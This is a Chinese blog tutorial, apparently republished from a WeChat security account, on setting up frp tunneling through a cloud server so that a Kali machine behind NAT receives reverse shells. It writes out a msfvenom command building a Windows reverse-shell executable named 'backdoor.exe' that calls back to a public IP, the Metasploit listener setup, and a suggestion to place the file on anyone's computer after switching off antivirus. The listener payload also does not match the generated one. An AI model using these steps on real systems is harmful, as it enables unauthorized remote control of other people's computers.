内网接收外网shell(内网穿透)
2022-9-12 12:53:23 Author: 白安全组(查看原文) 阅读量:40 收藏

前言:

内网穿透的方式不少,有人会也有人不太懂,最简单的,对新手友好的就是花生壳,但是要钱,对穷人不友好,这里我们就用操作稍微有点麻烦的但是免费的frp

工具:

我们到官网上下载就好了:

https://github.com/fatedier/frp/releases 

我这里下载的是最新版,当然我们还需要准备一台服务器,腾讯云什么就好

轻量级就可以了,当然你也可以用自己的物理机(shell的接收是虚拟机中的kali

轻量级就可以了,当然你也可以用自己的物理机(shell的接收是虚拟机中的kali

最后就是准备一台kalimsf了。

正文:

步骤其实很简单,我们首先将下好的frp传到服务器和kali中,解压(不会的百度)

这是服务器的

这是Kali中的

然后我们就可以开始修改配置文件了,kali这边属于客户端,主要用的是frpc,所以我们配置frpc.ini这个配置文件就好了。

我们修改一个server_addr这里的IP,换成服务器的IP

然后我们还需要加上msf用的端口

直接加在这下面就好,名字随意,4445这个端口也可以随意,但是要记住后面要用

然后其他的不变,这里需要注意一点,服务器的安全组策略需要将700080006000三个开启,这里以腾讯云举例

添加三个即可

这样我们到服务器中,启动服务器中的frps

首先我们要给一个执行权限:

chmod +x frps

然后启动:

./frps -c ./frps.ini

这里启动成功了,我们到kali中启动,注意顺序,服务端要先开不然没用

Kali中也是一样先加上执行权限:

chmod +x frpc

然后启动:

./frpc -c ./frpc.ini

这样两边就都启动成功了。(这里不讲配置的一些理论理解了,麻烦,大家可以百度内网穿透的理论知识)

我们需要生成一下木马文件

msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=101.43.1.181 LPORT=8000 -f exe -o backdoor.exe

-o选择文件名,ip地址选择外网服务器的地址 端口选择8000

下载到桌面

我这里用xshell来实现

然后我们打开msf开启监听

启动:

msfdb run

使用:

use exploit/multi/handler 

选择payload

set payload windows/meterpreter/reverse_tcp

设置IP和端口

然后我们生成就好,放到任意谁的电脑上,但是要关杀软,因为我们没加免杀,Windows自带的检测也要关闭

运行后成功外网上线

扫描二维码关注我们吧!


文章来源: http://mp.weixin.qq.com/s?__biz=MzU4MjYxNTYwNA==&mid=2247486020&idx=1&sn=4d4d92ddc2c55fae7ca90fa181bdfaf1&chksm=fdb4dd1fcac35409022e75f36c4476b18068c36cb6bd408282e3756c015cad9f45b97815ab7d#rd
如有侵权请联系:admin#unsafe.sh